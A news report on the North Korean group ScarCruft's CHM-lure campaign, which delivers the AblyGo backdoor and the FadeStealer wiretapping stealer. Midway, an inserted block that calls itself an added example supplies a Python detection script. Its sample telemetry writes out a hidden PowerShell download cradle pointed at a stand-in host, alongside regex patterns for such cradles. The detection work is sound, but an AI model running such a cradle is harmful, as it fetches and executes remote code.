ScarCruft Hackers Deploy Information Stealing Malware With Wiretapping Features

Posted on June 21, 2023 at 7:15 AM

ScarCruft, a threat actor group based in North Korea, has been observed deploying information-stealing malware in recent campaigns. The toolset includes a backdoor written in Golang and an information stealer with wiretapping features, and the backdoor abuses the Ably real-time messaging platform as its command-and-control channel rather than relying on attacker-owned infrastructure.

ScarCruft abuses the Ably service for command and control

The campaign was documented in a technical report published by the AhnLab Security Emergency Response Center (ASEC). According to the report, the Golang backdoor receives its commands through an Ably channel, and the API key needed to join that channel was stored in a GitHub repository rather than being embedded in the malware itself.

“This API key value is necessary for communicating with the threat actor’s channel, so anyone is capable of subscribing if they know this key value. Due to this, some of the commands used by the threat actor at the time of analysis could be identified,” the ASEC report said.

ScarCruft is a threat actor group based in North Korea. The state-sponsored threat actor group has previously been associated with the North Korean Ministry of State Security (MSS). This hacking group has remained active since around 2012.

Attack chains attributed to the group have historically revolved around spear-phishing lures that deliver RokRAT, alongside a variety of other custom tools used to collect sensitive information from targets.

The latest intrusion documented by ASEC researchers took place in May 2023. The phishing email carried a Microsoft Compiled HTML Help (.CHM) file, a lure format first reported in March of this year. When the victim opens the file, it contacts a remote server and downloads PowerShell malware.

The PowerShell malware fetched from the remote server is known as Chinotto. Chinotto establishes persistence on the host and retrieves additional payloads, among them a backdoor codenamed AblyGo (tracked as SidLevel by Kaspersky).

AblyGo abuses the Ably API service for command and control and, in turn, serves as the launcher for an information stealer known as FadeStealer.

FadeStealer carries a wide range of collection features: it can capture screenshots, collect data from connected smartphones and removable media, record audio from the microphone, and log keystrokes.

The ASEC report also notes that ScarCruft, which is also tracked as the RedEyes group, aims its campaigns at specific individuals rather than at organizations at large. Targets of this campaign include North Korean defectors, human rights activists, and university professors, and the primary objective is information theft.

The activity also extends to targets in South Korea, where the malware's microphone recording amounts to unauthorized eavesdropping, a privacy violation that is strictly regulated under the relevant laws. Beyond monitoring the victims' activity on their PCs, the threat actor used these wiretapping capabilities to steal data.

CHM files are abused by other North Korean hackers

CHM files have also been used by other hacking groups that are also based in North Korea, including Kimsuky. A report by SentinelOne has also disclosed a recent hacking campaign that leveraged the file format to launch a reconnaissance tool known as RandomQuery.

In the new set of campaigns detected by ASEC researchers, the CHM files are configured to drop a BAT file. That batch script then downloads the next-stage malware, which exfiltrates user information from the compromised host.
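The CHM-to-script chain described above (help file opened, batch file dropped, PowerShell stage pulled from a remote server) is visible in endpoint process telemetry, because the Windows HTML Help viewer (hh.exe) has no business spawning command interpreters. The following is an added example, not code from the ASEC report or from the KoDDoS article, that reconstructs process trees from Sysmon-style process-creation events and flags script hosts descended from hh.exe, annotating each hit with the command-line traits a practitioner would look for. The event records, paths, PIDs and the staging URL are constructed for this example and are not indicators from the campaign.

```python
"""Hunt for script interpreters spawned (directly or indirectly) by hh.exe.

Input is newline-delimited JSON with the fields a Sysmon Event ID 1 record
provides once flattened: pid, ppid, image (full path) and cmdline.
"""
import json
import re
from collections import defaultdict

# Constructed sample telemetry. Hosts, paths, PIDs and the URL are invented
# for this example; they are not indicators of compromise from the campaign.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"pid": 1000, "ppid": 500, "image": r"C:\Windows\explorer.exe",
                "cmdline": "explorer.exe"}),
    json.dumps({"pid": 2000, "ppid": 1000, "image": r"C:\Windows\hh.exe",
                "cmdline": r"hh.exe C:\Users\victim\Downloads\invitation.chm"}),
    json.dumps({"pid": 2100, "ppid": 2000, "image": r"C:\Windows\System32\cmd.exe",
                "cmdline": r'cmd.exe /c "C:\Users\victim\AppData\Local\Temp\update.bat"'}),
    json.dumps({"pid": 2200, "ppid": 2100,
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                           ".DownloadString('http://stage.example.invalid/p')\""}),
    # Benign: a help file opened with no child processes.
    json.dumps({"pid": 3000, "ppid": 1000, "image": r"C:\Windows\hh.exe",
                "cmdline": r"hh.exe C:\Windows\Help\legit.chm"}),
    # Benign: PowerShell launched by the user from Explorer, not from hh.exe.
    json.dumps({"pid": 4000, "ppid": 1000,
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"}),
])

# Interpreters and LOLBins that a help viewer should never be the ancestor of.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line traits that raise confidence; checked in this order.
INDICATORS = {
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitsadmin|certutil", re.I),
    "exec_policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "batch_dropper": re.compile(r"\.bat\b", re.I),
}


def parse_events(text):
    """Parse NDJSON process-creation events into a dict keyed by pid."""
    procs = {}
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            procs[ev["pid"]] = ev
    return procs


def basename(path):
    """Lower-cased file name of an image path, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_chm_script_chains(text):
    """Return every script host whose ancestry includes an hh.exe instance.

    Each finding records the offending pid, its image name, the pid of the
    hh.exe ancestor, how many hops below it the process sits, and which
    INDICATORS matched its command line.
    """
    procs = parse_events(text)
    children = defaultdict(list)
    for ev in procs.values():
        children[ev["ppid"]].append(ev["pid"])

    findings = []
    for pid, ev in procs.items():
        if basename(ev["image"]) != "hh.exe":
            continue
        # Depth-first walk over every descendant of this help-viewer process.
        stack = [(child, 1) for child in children[pid]]
        while stack:
            cpid, depth = stack.pop()
            child = procs[cpid]
            name = basename(child["image"])
            if name in SCRIPT_HOSTS:
                hits = [k for k, rx in INDICATORS.items() if rx.search(child["cmdline"])]
                findings.append({"pid": cpid, "image": name, "chm_pid": pid,
                                 "depth": depth, "indicators": hits})
            stack.extend((g, depth + 1) for g in children[cpid])
    return sorted(findings, key=lambda f: (f["chm_pid"], f["depth"], f["pid"]))


if __name__ == "__main__":
    for finding in find_chm_script_chains(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed sample, the logic reports the cmd.exe that executes the dropped BAT file (one hop below hh.exe) and the hidden PowerShell download cradle beneath it (two hops), while ignoring both the help file that spawned nothing and the PowerShell session launched from Explorer. Walking descendants rather than only direct children matters here: the interesting PowerShell stage is the grandchild of hh.exe, so a parent-child-only rule would miss it.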

Spear-phishing has been Kimsuky's preferred initial access technique for more than ten years, and its campaigns are typically preceded by extensive research and preparation, according to an advisory from US and South Korean intelligence agencies.

The findings also follow active exploitation by the Lazarus Group of security vulnerabilities in South Korean software such as MagicLine4NX, INISAFE CrossWeb EX, VestCert, and TCO!Stream.

Publisher: KoDDoS
